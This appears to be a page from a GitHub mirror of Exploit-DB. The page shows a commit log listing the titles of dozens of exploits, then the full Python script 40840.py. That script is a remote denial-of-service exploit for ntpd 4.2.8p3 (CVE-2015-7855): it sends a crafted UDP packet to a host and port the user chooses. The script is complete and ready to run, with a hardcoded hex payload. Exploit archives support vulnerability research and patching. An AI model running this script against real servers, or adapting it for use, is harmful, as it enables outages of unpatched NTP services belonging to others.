bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/dos/40840.py
Offensive Security 91b12c469e DB: 2016-11-29 
16 new exploits

rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)
rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)
rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)
rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)
NTP 4.2.8p3 - Denial of Service
Microsoft Internet Explorer 8 MSHTML - 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)
Microsoft Internet Explorer 11 MSHTML - 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion
Microsoft Internet Explorer 10 MSHTML - 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)
Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)

Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation
Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation
Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)
Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation

TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)
TFTP Server 1.4 - Remote Buffer Overflow (2)

TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)
TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)

Android - 'BadKernel' Remote Code Execution
VX Search Enterprise 9.1.12 - Buffer Overflow
Sync Breeze Enterprise 9.1.16 - Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Buffer Overflow
Dup Scout Enterprise 9.1.14 - Buffer Overflow
Disk Savvy Enterprise 9.1.14 - Buffer Overflow
Disk Pulse Enterprise 9.1.16 - Buffer Overflow

Linux/x86 - Egg-hunter Shellcode (25 bytes)
Linux/x86 - Egg-hunter Shellcode (31 bytes)

RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion
RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion

CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion
CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion

CMS Faethon 2.0 - (mainpath) Remote File Inclusion
CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion

SazCart 1.5 - (cart.php) Remote File Inclusion
SazCart 1.5 - 'cart.php' Remote File Inclusion

Cyberfolio 2.0 RC1 - (av) Remote File Inclusion
Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion

FipsCMS 4.5 - (index.asp) SQL Injection
FipsCMS 4.5 - 'index.asp' SQL Injection

AJ Classifieds 1.0 - (postingdetails.php) SQL Injection
AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection

RunCMS 1.5.2 - (debug_show.php) SQL Injection
RunCMS 1.5.2 - 'debug_show.php' SQL Injection

OneCMS 2.4 - (userreviews.php abc) SQL Injection
OneCMS 2.4 - 'abc' Parameter SQL Injection

RunCMS 1.6 - disclaimer.php Remote File Overwrite
RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite
PHPEasyData 1.5.4 - 'cat_id' SQL Injection
FipsCMS - 'print.asp lg' SQL Injection
Galleristic 1.0 - (index.php cat) SQL Injection
gameCMS Lite 1.0 - (index.php systemId) SQL Injection
PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection
FipsCMS 2.1 - 'print.asp' SQL Injection
Galleristic 1.0 - 'cat' Parameter SQL Injection
GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection

CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities
CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting
MusicBox 2.3.7 - (artistId) SQL Injection
RunCMS 1.6.1 - (msg_image) SQL Injection
MusicBox 2.3.7 - 'artistId' Parameter SQL Injection
RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection

vShare YouTube Clone 2.6 - (tid) SQL Injection
vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection
Cyberfolio 7.12 - (rep) Remote File Inclusion
miniBloggie 1.0 - (del.php) Arbitrary Delete Post
Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion
miniBloggie 1.0 - 'del.php' Arbitrary Delete Post

SazCart 1.5.1 - (prodid) SQL Injection
SazCart 1.5.1 - 'prodid' Parameter SQL Injection

Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting

Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection
Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection

Joomla! Component com_datsogallery 1.6 - Blind SQL Injection
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
Vortex CMS - 'index.php pageid' Blind SQL Injection
AJ Article 1.0 - (featured_article.php) SQL Injection
AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection
Vortex CMS - 'pageid' Parameter Blind SQL Injection
AJ Article 1.0 - 'featured_article.php' SQL Injection
AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection

clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ClanLite 2.x - SQL Injection / Cross-Site Scripting

OneCMS 2.5 - (install_mod.php) Local File Inclusion
OneCMS 2.5 - 'install_mod.php' Local File Inclusion
AJ Auction Web 2.0 - (cate_id) SQL Injection
AJ Auction 1.0 - 'id' SQL Injection
AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection
AJ Auction 1.0 - 'id' Parameter SQL Injection

FipsCMS Light 2.1 - (r) SQL Injection
FipsCMS Light 2.1 - 'r' Parameter SQL Injection

AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection
AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection

AJ Auction Pro Platinum - (seller_id) SQL Injection
AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection

miniBloggie 1.0 - (del.php) Blind SQL Injection
miniBloggie 1.0 - 'del.php' Blind SQL Injection

AJ Article - 'featured_article.php mode' SQL Injection

AJ ARTICLE - (Authentication Bypass) SQL Injection
AJ Article 1.0 - Authentication Bypass

Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion
Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion

AJ ARTICLE - Remote Authentication Bypass
AJ Article 1.0 - Remote Authentication Bypass

MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection
MusicBox 2.3.8 - 'viewalbums.php' SQL Injection

AJ Auction Pro OOPD 2.3 - 'id' SQL Injection
AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection

BigACE CMS 2.5 - 'Username' SQL Injection
BigACE 2.5 - SQL Injection

ZeusCart 2.3 - 'maincatid' SQL Injection
ZeusCart 2.3 - 'maincatid' Parameter SQL Injection

BigACE CMS 2.6 - (cmd) Local File Inclusion
BigACE 2.6 - 'cmd' Parameter Local File Inclusion

RunCMS 1.6.3 - (double ext) Remote Shell Injection
RunCMS 1.6.3 - Remote Shell Injection

AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection
AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection
RunCMS 2m1 - store() SQL Injection
RunCMS 2ma - post.php SQL Injection
RunCMS 2m1 - 'store()' SQL Injection
RunCMS 2ma - 'post.php' SQL Injection

AJ Article - Persistent Cross-Site Scripting
AJ Article 3.0 - Cross-Site Scripting

admidio 2.3.5 - Multiple Vulnerabilities
Admidio 2.3.5 - Multiple Vulnerabilities

RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections
RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection

MusicBox 2.3 - Type Parameter SQL Injection
MusicBox 2.3 - 'type' Parameter SQL Injection

RunCMS 1.x - Bigshow.php Cross-Site Scripting
RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting

RunCMS 1.2/1.3 - PMLite.php SQL Injection
RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection

RunCMS 1.x - Ratefile.php Cross-Site Scripting
RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting

BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)
BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)
MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection
MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting
MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting
MusicBox 2.3 - 'index.php' SQL Injection
MusicBox 2.3 - 'index.php' Cross-Site Scripting
MusicBox 2.3 - 'cart.php' Cross-Site Scripting

MusicBox 2.3.4 - Page Parameter SQL Injection
MusicBox 2.3.4 - 'page' Parameter SQL Injection

MyWebland miniBloggie 1.0 - Fname Remote File Inclusion
miniBloggie 1.0 - 'Fname' Remote File Inclusion
BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion
BigACE 1.8.2 - 'item_main.php' Remote File Inclusion
BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion
BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion
BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion

ClanLite - Config-PHP.php Remote File Inclusion
ClanLite - 'conf-php.php' Remote File Inclusion

FipsCMS 2.1 - PID Parameter SQL Injection
FipsCMS 2.1 - 'pid' Parameter SQL Injection
RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion
RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion

FipsCMS 2.1 - 'forum/neu.asp' SQL Injection
FipsCMS 2.1 - 'neu.asp' SQL Injection
OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting
OneCMS 2.6.1 - search.php search Parameter SQL Injection
OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting
OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting
OneCMS 2.6.1 - 'search' Parameter SQL Injection
OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting

RunCMS 'partners' Module - 'id' Parameter SQL Injection
RunCMS Module Partners - 'id' Parameter SQL Injection

Zeuscart v.4 - Multiple Vulnerabilities
Zeuscart 4.0 - Multiple Vulnerabilities

BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal
BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal
Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting
Red Hat JBoss EAP - Deserialization of Untrusted Data
2016-11-29 05:01:20 +00:00

26 lines
1.5 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855
import sys
import socket
if len(sys.argv) != 3:
print "usage: " + sys.argv[0] + " <host> <port>"
sys.exit(-1)
payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"
Reference in a new issue View git blame Copy permalink